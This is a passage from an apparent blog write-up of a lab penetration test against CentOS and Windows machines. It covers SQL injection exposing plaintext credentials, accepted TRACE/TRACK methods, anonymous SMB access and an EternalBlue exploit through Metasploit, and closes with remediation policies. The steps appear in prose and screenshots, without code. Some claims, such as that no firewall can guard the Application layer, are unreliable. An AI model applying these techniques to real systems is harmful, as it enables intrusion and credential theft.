&lt;p&gt;Here, we can see that the passwords for two accounts (Lora Brown and Matt Brown) are stored in plaintext in the back-end database. Storing passwords in plaintext is not a recommended approach; they should be stored as hashes. Moreover, the credentials for the Windows system are also stored here. Both machines were logged into using these credentials, as shown below. This shows that the web application running on the CentOS server is wide open to SQL injection attacks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KBcXHVwr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pbb50e1phun3kn6fpseb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KBcXHVwr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pbb50e1phun3kn6fpseb.png" alt="Server" width="512" height="228"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--uIlGqZrB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dyzly6m3tk5or0zhnjze.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--uIlGqZrB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dyzly6m3tk5or0zhnjze.png" alt="Desktop" width="512" height="279"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Another advantage of a SQL injection attack is that it does not create persistence-related issues on the victim system. Even in this case, the attack is persistent and stealthy because we are operating well above the Network layer of the TCP/IP stack, and no antivirus or firewall (if present) can guard against attacks at the Application layer. That is why we chose such a persistent attack to get into the system in the first place. This also points to the vulnerability in the deployed web application, which should be patched to curtail injection attacks. Moreover, since the web application is served on port 80 rather than 443, the entire session is unencrypted, leaving all correspondence with the web application open to sniffers and eavesdroppers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;Issue with the Windows Operating System&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
While logging into the Windows machine, we found that it is not running a genuine copy of the operating system.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--yQfosK1Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ofu8l7slnr5w2d7oto9w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--yQfosK1Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ofu8l7slnr5w2d7oto9w.png" alt="Not genuine copy" width="512" height="277"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This means that the machine will not receive any official updates, security patches or service packs, making it vulnerable to a wide variety of attacks. Moreover, using a counterfeit copy of a commercially licensed operating system is not acceptable in many parts of the world.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;HTTP TRACE Request on CentOS Web Server&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
Since attackers use the HTTP TRACE request method to enumerate websites, it should not be allowed. That is not the case with the web service running on CentOS, which accepts TRACE requests. Using the Mozilla Firefox browser, we first modified our HTTP request to the web service, replacing the GET method with TRACE in order to see the website’s response, as shown in the figure below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---vLaaOiY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9w8ooqa6khag28u4c9pv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---vLaaOiY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9w8ooqa6khag28u4c9pv.png" alt="" width="512" height="188"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We noticed that the website responded to our TRACE request, with the response shown in ASCII as below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8_yVDaMy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8ks3ejudao4a8vq5dkp1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8_yVDaMy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8ks3ejudao4a8vq5dkp1.png" alt="" width="512" height="100"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When we converted this ASCII back into readable form, we obtained the actual response the website generated for our TRACE request. Ideally, the website should block TRACE, but it does not, and that is a vulnerability that would help any attacker fingerprint and/or enumerate the website.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--zFV8D46V--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2g725cyc8dq7oq7z6nyq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--zFV8D46V--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2g725cyc8dq7oq7z6nyq.png" alt="" width="512" height="205"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;HTTP TRACK Request on CentOS Web Server&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
Similarly, the website also responds to the TRACK HTTP request method, which attackers use to debug web server connections. Ideally, it should be blocked, but the web application does not block it and instead responds to such requests. The image below shows the HTTP 200 OK response to the TRACK request. We again used the Mozilla Firefox browser to replace the GET request method with TRACK.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_iHVXp-g--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m3aiyu0a0oxleq8hf2hz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_iHVXp-g--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m3aiyu0a0oxleq8hf2hz.png" alt="" width="512" height="224"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;Anonymous READ/WRITE in CentOS (SMB Vulnerability)&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
The SMB (Server Message Block) service on the CentOS server requires no authentication, so anyone, even anonymous users, can get read and/or write access on the remote machine, as shown in the image below. The administrator has not configured any security whatsoever in this regard. This vulnerability can lead to man-in-the-middle attacks on the CentOS machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--eF55czAV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3j71g4b2q0ed5hkiuxul.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--eF55czAV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3j71g4b2q0ed5hkiuxul.png" alt="" width="512" height="264"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;SMB Vulnerability in Windows Desktop Machine&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
Like the CentOS machine, the Windows machine was also vulnerable through SMB. The Windows machine is at IP address 192.168.10.20, and scanning found that it also has a remote code execution vulnerability in its SMB service, as it runs an older version of SMB that has not been updated or patched.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--f1nA90gb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v8nguc3zuiqp3y8xnj80.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--f1nA90gb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v8nguc3zuiqp3y8xnj80.png" alt="" width="512" height="191"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;EternalBlue Vulnerability in Windows Desktop&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
Due to the SMB vulnerability, the Windows system was exploited using the EternalBlue exploit. The Metasploit Framework was used on a Kali Linux machine for the exploitation, as shown in the figures below. Metasploit is a framework built into the Kali Linux operating system that contains known and published payloads and exploit code. It can be used for learning and educational purposes. In the image below, we set the target IP to that of the Windows machine (192.168.10.25) and the remote port to 445, on which the vulnerable SMB service is listening. This builds a persistent connection and presence on the victim system because the vulnerable version of SMB installed there is unable to detect the payload.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--HNotHZUa--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pz6okggq7wsa9a38no56.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--HNotHZUa--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pz6okggq7wsa9a38no56.png" alt="" width="512" height="204"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The Meterpreter session has opened, which shows that the exploit executed successfully on the remote Windows machine without being detected, as shown below. Now that the session has been established, the remote system can be probed or fingerprinted by issuing commands from the Meterpreter terminal in Kali Linux.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5UZQCKRQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/scsgcalnmu8d1j0v6sq7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5UZQCKRQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/scsgcalnmu8d1j0v6sq7.png" alt="" width="512" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Moreover, the following security policies need to be implemented on both systems.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Password Security and Management Policy to ensure that passwords meet the minimum complexity criteria, are properly managed and secured, and are not stored anywhere in plaintext.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Security Patching and Update Policy to ensure that the operating system and other applications running on the system are updated and patched against known security vulnerabilities. This would rule out attacks with known CVE numbers launched against vulnerable applications and services.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Web Security Policy to ensure that the web applications running on the system are secure, sanitize and validate incoming requests, and do not expose the backend database and host system to malicious attackers who try to compromise the website through crafted HTTP requests and injections.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Software Procurement and Licensing Policy to ensure that the system is not running a counterfeit operating system but a genuine, licensed version of Windows.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Access Control and Authentication Policy to ensure that anonymous and unprivileged users do not get admin or root privileges on the system, and that access levels are properly defined and thoroughly implemented.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>sql</category>
      <category>ctf</category>
    </item>
  </channel>
</rss>
